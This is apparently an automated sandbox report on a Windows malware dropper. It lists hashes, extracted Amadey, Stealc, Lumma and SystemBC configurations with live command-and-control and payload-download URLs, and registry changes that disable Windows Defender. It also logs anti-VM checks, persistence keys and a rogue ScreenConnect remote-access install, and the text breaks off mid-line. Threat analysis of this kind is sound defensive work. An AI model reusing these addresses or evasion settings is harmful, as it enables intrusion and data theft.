Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20-02-2025 12:52
Static task
static1
Behavioral task
behavioral1
Sample
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe
Resource
win10v2004-20250217-en
General
-
Target
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe
-
Size
5.5MB
-
MD5
d0a8f8009be5fca50f51f921172f1c09
-
SHA1
fb248ffa5b3016254ac0f42412fe68e1d38761ef
-
SHA256
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470
-
SHA512
d3e56567fb53f487ffbe7e79794e09b61f688a35cfeadf1f58a1039cc54aa3a6c2637be7deb0e6a86c66e59d49ac034f01d55d1911054613b11d625d58687fb9
-
SSDEEP
98304:rvdN5/3I03K4/mEAynzEaWnHY1QSFFO9w9u7AYqTdp8FxFvf8lS1IenvCN9ySf3w:xN5/Y03j/mEAd3Y1QSFFOp770P8F7f8D
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
C:\Users\Admin\Desktop\IMPORTANT_FILE_2.txt
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
lumma
https://penetratebatt.pw/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/1188-1902-0x00000000007B0000-0x0000000000C04000-memory.dmp healer behavioral1/memory/1188-1901-0x00000000007B0000-0x0000000000C04000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
Stealc family
-
Systembc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2O4054.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f9ec9ef64.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1n70A2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3Z15F.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ snihdww.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 101 3824 powershell.exe -
pid Process 3404 powershell.exe 5528 powershell.exe 3824 powershell.exe 5912 powershell.exe 5280 powershell.exe 4592 powershell.exe -
Downloads MZ/PE file 17 IoCs
flow pid Process 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 23 4232 skotes.exe 92 4232 skotes.exe 92 4232 skotes.exe 115 6072 futors.exe 115 6072 futors.exe 101 3824 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=1d4ae042-a21b-414a-89b9-8ff89d22e106&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAaqpainjvYkevuNXmbuIq3QAAAAACAAAAAAAQZgAAAAEAACAAAAB9sr%2bcdW1KX77U2DxPM%2fJLzgbm%2f93oVUY3UWTn7HhrVwAAAAAOgAAAAAIAACAAAADWmgUI0XpeGmM0sxOEDr3P7vf2dyahwU8GbdiogwMlhaAEAADFFjomx41OM%2bMTAhaGQXO%2fAm36oDGM199tbHH0qGGgGKa4LCnUZGQyyc6g079B8vYlMaQMePoaHau8IOzj98stjBTXFrE%2fYYBHdV0TUDazqVLK8McMP6famXWvy0qYHxHbLiRDgUx%2by8Mx4bLRVu4qCMT4q61PlNyb%2bcNgaOcedaWT%2f7x7doCdn1ezdRWcTx98lVE6eaYCA7aZpmhQiCGPNND0d%2b8xdIZuFylMT7wK0dVk%2bg8BjkrdmU7ljV1c4oaJUqpwRxSe7L4epp2gPOvDSaRHlRpzow25vLWSWXYiT21kzp1FjFl1c2dyteCgpcHuAbQ79iAcVaD%2fBwDbGpQZnz5QeRU51B%2fEY4seBgF%2fKU3%2bjKQl1GDnxeyQZxI%2bpgxZteYK9UJz4mESux4xmDIrC6NwaRkogE8vYgSuVvvATuuNNAOWUlGHT9OnT371UorxmfFXkNJwVpKL6lusARmQUFJdnh8fYIG227Iz4sXfUTyHHaKmKToAHMMW0%2faUkzE2In9UclSOp7KLAVcFcGfR3n71zwph50y6i67ChTMgD8x9G6xCmpntdFZ%2bJWTMIUUsGgS6CyRXJ1qj2gmr1M4434%2b6Jd9Sq77gDrdoe2EUMTyNWebiVs6oX%2frI1WIQth263mHYV5IwxyuEzdRuS2tMBELXEiATiQ0LfX0hyo2gVIVe4%2f5krcBuaaokZlCjnP%2fm3bxHLsmvzqgOKH5m5Km7lT32h6%2bTOERqYcrfpIPoPJ%2bsIpBQh0J2eZmcoF5Ed9jdroc46G5DMBnHkUrXBAHygI%2f44FwxYE0Y5RtB0Sck79nMlGJe6o4qAVqW3%2fkuKYkifOIF3mlv6Emgy8krNh14RRNIyY0lfK9zHWRvRUiE6WuELubiB5Z3oivHDqtS86nnNiJ2HfJmJIZjhL2oLZ2k7C8Y8mJ7K5wdb8878g1MoS%2bmutCcqt%2fxhRcYIQxXB%2f0hgsdRyyHQ4lmPXfeO9UhTUTIVIX49AQI%2ffq%2bkL0Lxh3Pqcx%2f%2bIYoOaWaYMXy%2bUJ4PpI%2bgVpVdkR1Wz9O4gOTnl03u5iTf0RGHhpXNDkkVGWq0TX3p3KqzTZmhGyU52w%2fy%2fn7HVMTgUbfyNs%2bmnFjYJijIuQM60LaTruiQYYcGXv%2fA0%2flqL1J%2bE30460Ig%2b9GxQCuUSw7E6vowB%2bxcITgLnH3p9BSVfe0qTCRSW36FwNmRnBe1lQI9SGI28k0%2fKBwfN0FQxmlp8Z6ucJ%2bUxct6I%2fitMIn3masSyoZJoGN6ZEygweT3ersPMFDC%2bQMGShx3vlbtHXYqfNefuurl%2btdZE39WPh%2b3qKTlHHglp74RAavmGWc%2fHkzoEotTnjkG7L2tIgg7bCYIwyhTB%2fGlSd%2fi0DVdGRk145bxIQgR2SWTO6xgrDcjZdkIGlngkYyCu2BbvP%2bnwjdjuBPk4Qc%2fH2ddasAHvDl9xCzon1FhlBGlMxGuBY3r1504nT7Cxqf2jVFmITqDQ%2bn7Xg0dbjPlVx8BUpQ0kstkNslcK5sz3P94jo6UNS4scQSkIo8V8pdkqxdvPleVgz1a0DbBbeWowCP0amfbaKPufEqWKetjYdnJEEAAAABj33WlTyaqxtHSk1JuCT5GhTYCzJ4hRWL3qAFUJm4qtJzzQ%2bbVNn1UxGTB5kKI8jye2coovwE%2bud0a%2fP4eypm9&c=prequest&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f9ec9ef64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2O4054.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3Z15F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion snihdww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1n70A2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2O4054.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3Z15F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion snihdww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f9ec9ef64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1n70A2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation a1EoH8b.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation sQ3DZPU.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 1n70A2.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation skotes.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 42 IoCs
pid Process 4228 b1X18.exe 2620 1n70A2.exe 4232 skotes.exe 2364 2O4054.exe 432 3Z15F.exe 3992 skotes.exe 3564 dzvh4HC.exe 2492 YMci4Rc.exe 1680 YMci4Rc.exe 4680 YMci4Rc.exe 932 9aiiMOQ.exe 3188 9aiiMOQ.exe 1732 NL58452.exe 4852 NL58452.exe 1768 f3Ypd8O.exe 2356 f3Ypd8O.exe 4668 kdMujZh.exe 3628 skotes.exe 1508 sQ3DZPU.exe 380 a1EoH8b.exe 3432 snihdww.exe 5048 MAl7pjE.exe 4004 ScreenConnect.ClientService.exe 968 apisysDirectx.exe 4944 ScreenConnect.WindowsClient.exe 712 ScreenConnect.WindowsClient.exe 4964 launcher.exe 1212 launcher.exe 1376 game.exe 3916 amnew.exe 6020 game.exe 6072 futors.exe 3180 078fa63d7b.exe 1188 TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE 5696 skotes.exe 5216 8f9ec9ef64.exe 4204 futors.exe 6012 trano1221.exe 5684 apisysDirectx.exe 5348 trano1221.exe 3720 con12312211221.exe 2200 con12312211221.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 1n70A2.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 8f9ec9ef64.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 2O4054.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 3Z15F.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine snihdww.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine MAl7pjE.exe -
Loads dropped DLL 64 IoCs
pid Process 4496 MsiExec.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 1732 rundll32.exe 2772 MsiExec.exe 3944 MsiExec.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 1212 launcher.exe 1212 launcher.exe 1212 launcher.exe 1212 launcher.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe 6020 game.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" b1X18.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\078fa63d7b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089179101\\078fa63d7b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089180021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000002415d-1567.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\x3n4fsfz.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\x3n4fsfz.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ONEFIL~2\\image.png" game.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2620 1n70A2.exe 4232 skotes.exe 2364 2O4054.exe 432 3Z15F.exe 3992 skotes.exe 4668 kdMujZh.exe 3628 skotes.exe 3432 snihdww.exe 5048 MAl7pjE.exe 1188 TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE 5696 skotes.exe 5216 8f9ec9ef64.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2492 set thread context of 4680 2492 YMci4Rc.exe 98 PID 932 set thread context of 3188 932 9aiiMOQ.exe 103 PID 1732 set thread context of 4852 1732 NL58452.exe 107 PID 1768 set thread context of 2356 1768 f3Ypd8O.exe 111 PID 3720 set thread context of 2200 3720 con12312211221.exe 178 -
resource yara_rule behavioral1/files/0x000b000000023c54-55.dat upx behavioral1/memory/3564-66-0x0000000000DB0000-0x0000000002072000-memory.dmp upx behavioral1/memory/3564-116-0x0000000000DB0000-0x0000000002072000-memory.dmp upx behavioral1/memory/3564-1728-0x0000000000DB0000-0x0000000002072000-memory.dmp upx behavioral1/memory/5348-2043-0x00007FF9534A0000-0x00007FF953A89000-memory.dmp upx behavioral1/memory/5348-2044-0x00007FF967030000-0x00007FF967053000-memory.dmp upx behavioral1/memory/5348-2045-0x00007FF973130000-0x00007FF97313F000-memory.dmp upx behavioral1/memory/5348-2046-0x00007FF96D0F0000-0x00007FF96D109000-memory.dmp upx behavioral1/memory/5348-2048-0x00007FF96C640000-0x00007FF96C64D000-memory.dmp upx behavioral1/memory/5348-2050-0x00007FF95E110000-0x00007FF95E13D000-memory.dmp upx behavioral1/memory/5348-2051-0x00007FF95DEF0000-0x00007FF95DF26000-memory.dmp upx behavioral1/memory/5348-2049-0x00007FF96C140000-0x00007FF96C159000-memory.dmp upx behavioral1/memory/5348-2052-0x00007FF96C600000-0x00007FF96C60D000-memory.dmp upx behavioral1/memory/5348-2054-0x00007FF95DEB0000-0x00007FF95DEE3000-memory.dmp upx behavioral1/memory/5348-2064-0x00007FF9534A0000-0x00007FF953A89000-memory.dmp upx behavioral1/memory/5348-2065-0x00007FF95D5C0000-0x00007FF95D68D000-memory.dmp upx behavioral1/memory/5348-2066-0x00007FF967030000-0x00007FF967053000-memory.dmp upx behavioral1/memory/5348-2067-0x00007FF9521F0000-0x00007FF952710000-memory.dmp upx behavioral1/memory/5348-2070-0x00007FF956F00000-0x00007FF956FCF000-memory.dmp upx behavioral1/memory/5348-2071-0x00007FF956E70000-0x00007FF956EF7000-memory.dmp upx behavioral1/memory/5348-2074-0x00007FF95D590000-0x00007FF95D5B6000-memory.dmp upx behavioral1/memory/5348-2073-0x00007FF96C540000-0x00007FF96C54B000-memory.dmp upx behavioral1/memory/5348-2075-0x00007FF956D50000-0x00007FF956E6C000-memory.dmp upx behavioral1/memory/5348-2072-0x00007FF9677A0000-0x00007FF9677B4000-memory.dmp upx behavioral1/memory/5348-2078-0x00007FF95DEB0000-0x00007FF95DEE3000-memory.dmp upx behavioral1/memory/5348-2077-0x00007FF95BC60000-0x00007FF95BCA3000-memory.dmp upx behavioral1/memory/5348-2069-0x00007FF96D0F0000-0x00007FF96D109000-memory.dmp upx behavioral1/memory/5348-2079-0x00007FF967010000-0x00007FF967022000-memory.dmp upx behavioral1/memory/5348-2125-0x00007FF956F00000-0x00007FF956FCF000-memory.dmp upx behavioral1/memory/5348-2127-0x00007FF9677A0000-0x00007FF9677B4000-memory.dmp upx behavioral1/memory/5348-2126-0x00007FF956E70000-0x00007FF956EF7000-memory.dmp upx behavioral1/memory/5348-2124-0x00007FF9521F0000-0x00007FF952710000-memory.dmp upx -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect 